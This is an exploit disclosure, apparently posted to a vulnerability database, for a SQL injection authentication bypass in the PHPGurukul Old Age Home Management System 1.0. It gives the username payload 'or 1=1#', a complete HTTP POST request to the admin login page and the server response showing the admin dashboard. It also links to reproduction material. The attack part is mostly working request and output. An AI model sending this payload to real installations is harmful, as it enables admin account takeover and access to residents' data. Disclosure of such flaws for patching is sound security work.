## Title: Old Age Home Management-2022-2023-1.0 SQLi-Bypass-Authentication-Account-Take-Over ## Author: nu11secur1ty ## Date: 04.29.2023 ## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/ ## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette ## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty' or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it. STATUS: CRITICAL [+]Exploit: ```MYSQL POST /oahms/admin/login.php HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg Content-Length: 62 Cache-Control: max-age=0 Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://pwnedhost.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://pwnedhost.com/oahms/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close username=nu11secur1ty%27+or+1%3D1%23&password=password&submit= ``` [+]Responce: ```HTTP HTTP/1.1 200 OK Date: Sat, 29 Apr 2023 05:32:07 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0 Content-Security-Policy: upgrade-insecure-requests; X-Powered-By: PHP/8.2.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13518 Old Age Home Management System|| Dashboard ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0) ## Proof and Exploit [href](https://streamable.com/qtj0bz) ## Time spend: 00:30:00